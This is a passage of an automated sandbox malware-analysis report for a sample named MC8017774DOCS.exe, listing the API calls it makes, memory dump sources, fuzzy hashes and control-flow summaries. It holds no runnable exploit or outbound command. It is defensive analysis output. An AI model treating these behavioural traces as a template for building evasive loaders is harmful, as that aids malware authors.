• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp
• API String ID: 3248276644-2695492296
• Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
• Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
• Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
• Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
APIs
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063D9,80000002), ref: 004061AB
• RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 004061B6
Strings
Similarity
• API ID: CloseQueryValue
• String ID: Call
• API String ID: 3356406503-1824292864
• Opcode ID: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
• Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
• Opcode Fuzzy Hash: e86e6fd2e5cb5672620ff5ab575da48d8fe54f653cf1da9627cee5843be69ab4
• Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
• CloseHandle.KERNEL32(?), ref: 004058B6
Strings
• Error launching installer, xrefs: 00405893
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
• Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
• Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
• Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
APIs
• FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
• GlobalFree.KERNEL32(0084AA50), ref: 00403913
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3936084776
• Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
• Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
• Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
• Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MC8017774DOCS.exe,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
• CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MC8017774DOCS.exe,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                    • API String ID: 2709904686-3125694417
                                                                                                                                                    • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                    • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                                                                                                    • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                                    • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 6E9B116A
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B11C7
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B11D9
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6E9B1203
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                    • Opcode ID: 85a0b8a2d4a20bb74223fb6a93fc2d1590d73439ba9b351c36c6233761c75a81
                                                                                                                                                    • Instruction ID: a0b9b72749b6043e650913a186ec3d65f32c266c3dbef7ca9d1ff5125d52e49f
                                                                                                                                                    • Opcode Fuzzy Hash: 85a0b8a2d4a20bb74223fb6a93fc2d1590d73439ba9b351c36c6233761c75a81
                                                                                                                                                    • Instruction Fuzzy Hash: 41316FB29082169FEB008FEAD845A6B77ECEF57310700092AE944D7254E774DD4A9F61
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                    • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                    • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                                                                                    • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                    • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

Execution Graph

Execution Coverage:11.6%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:41
Total number of Limit Nodes:4
execution_graph (rendered graph omitted; node data recoverable from it): entry 3e466d0 -> 3e46738 CreateWindowExW -> 3e467f4; entry 3e44228 -> 3e44259 -> 3e444a0 -> 3e444e0 -> 3e44501 -> 3e44728 GetModuleHandleW -> 3e44755; entry 3e46888 -> 3e468ae -> 3e43a94 -> 3e43a9f, then either 3e47a49 -> 3e43bbc -> 3e43bc7 -> 3e48eaa CallWindowProcW, or 3e47a39 -> 3e47b60/3e47b70 -> 3e47b84 -> 3e47c28 CallWindowProcW (with a second path 3e47c28 -> 3e48de2 -> 3e43bbc CallWindowProcW -> 3e48dfa); entry 3e4b978 -> 3e4b9dd, which loops with 3e4be40 WaitMessage and exits to 3e4ba2a

Control-flow Graph

control_flow_graph for 3e4b978 (rendered graph omitted; its executed/not-executed colouring is not preserved): basic blocks 3e4b978-3e4beff; calls to 3e4a588, 3e4a594, 3e4a5a0, 3e4b564, 3e4b570, 3e4b580, 3e4b58c, 3e4b598; API call WaitMessage in block 3e4be40-3e4be6c
Memory Dump Source
• Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1160f10f29f4030caa622c6bf5d6354a31114a88a5006855045e692209d0eb04
• Instruction ID: e9b20345529c9ae971ddac41081e8616af69ada3b09ddde12c51b9d3c1b60a7a
• Opcode Fuzzy Hash: 1160f10f29f4030caa622c6bf5d6354a31114a88a5006855045e692209d0eb04
• Instruction Fuzzy Hash: A0F16B34A0030ACFDB14CFA9D984B9DBBF1FF88304F199269D545AB265DB74E846CB80

Control-flow Graph

control_flow_graph for 3e444e0 (rendered graph omitted; its executed/not-executed colouring is not preserved): basic blocks 3e444e0-3e44770; calls to 3e438b0, 3e438bc, 3e438cc, 3e41adc, 3e44779, 3e44788; API call GetModuleHandleW in block 3e44728-3e44753
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 03E44746
Memory Dump Source
• Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: c4ecbdf1314c9a623d20705bf9b01a3b40f139e9a9a65b5502227acddad63511
• Instruction ID: 7889bd0f4671fb439f6751de71f1c06e3e4ab3e3d1434555df101fa349ccedd8
• Opcode Fuzzy Hash: c4ecbdf1314c9a623d20705bf9b01a3b40f139e9a9a65b5502227acddad63511
• Instruction Fuzzy Hash: C1814970A00B458FDB24DF6AE14575ABBF1FF88204F048A6ED44ADBA90DB74E845CF91

Control-flow Graph

control_flow_graph for 3e466c4 (rendered graph omitted; its executed/not-executed colouring is not preserved): basic blocks 3e466c4-3e46841, with 3e46841 looping to itself; API call CreateWindowExW in block 3e46793-3e467f2
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03E467E2
Memory Dump Source
• Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 5498c313c822ef021a314e07018be6b454573a900895b4b8290d9da8b3a21d78
• Instruction ID: 7ebc67461c93a34bb449daf9a334d4b03b6079ed79666d171d2e650171991bae
• Opcode Fuzzy Hash: 5498c313c822ef021a314e07018be6b454573a900895b4b8290d9da8b3a21d78
• Instruction Fuzzy Hash: 3351C1B1D00349DFDB14CF99D984ADEFBB1BF48314F24922AE819AB210D7719845CF90

Control-flow Graph

control_flow_graph for 3e466d0 (rendered graph omitted; its executed/not-executed colouring is not preserved): basic blocks 3e466d0-3e46841, with 3e46841 looping to itself; API call CreateWindowExW in block 3e46753-3e467f2
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03E467E2
Memory Dump Source
• Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: c967d4d493579128775cfdaa08709989d9e11b0f559f05843544283f77ca0b77
• Instruction ID: 2b558e66c57f800ba7f7c85c6a840cb288a776f74c6e5187712fcd25eb4e2ac3
• Opcode Fuzzy Hash: c967d4d493579128775cfdaa08709989d9e11b0f559f05843544283f77ca0b77
• Instruction Fuzzy Hash: 1241BEB1D003499FDB14CF9AD984ADEFFB5BF48314F24922AE819AB210D775A845CF90

Control-flow Graph (rendered graph not reproduced; function spans 0x3e43bbc-0x3e48f2c with a call to 0x3e43a94, Executed / Not Executed coloring lost in extraction)
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 03E48ED1
Memory Dump Source
• Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 04badba8a1d30b08ace60d57f3ddaf0db4fe03aa9bfe712e7bb4c211493d208d
• Instruction ID: 0efbc03a0eb11ac39356ea1f3b98da3bdb4f2e1dc18b55955e8844b08d64557b
• Opcode Fuzzy Hash: 04badba8a1d30b08ace60d57f3ddaf0db4fe03aa9bfe712e7bb4c211493d208d
• Instruction Fuzzy Hash: 754147B4900309DFDB14CF99C888AAAFBF5FF8C314F248549E519AB321D775A841CBA1

Control-flow Graph (rendered graph not reproduced; function spans 0x3e446e0-0x3e44770, Executed / Not Executed coloring lost in extraction)
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 03E44746
Memory Dump Source
• Source File: 00000004.00000002.3453385306.0000000003E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3e40000_MC8017774DOCS.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 7ef950803981ec7c7279c76adbf0bdfd2cc93c4a4d1d4f6f88e44d6ace3f416e
• Instruction ID: a4d81e7ca203c45586760bd69c0184fe5f58baf5c26cc56c521ab95bf8ccada2
• Opcode Fuzzy Hash: 7ef950803981ec7c7279c76adbf0bdfd2cc93c4a4d1d4f6f88e44d6ace3f416e
• Instruction Fuzzy Hash: 90113FB6D007098FCB10CF9AD544B9EFBF4BF89224F11851AD468A7200C3B9A505CFA1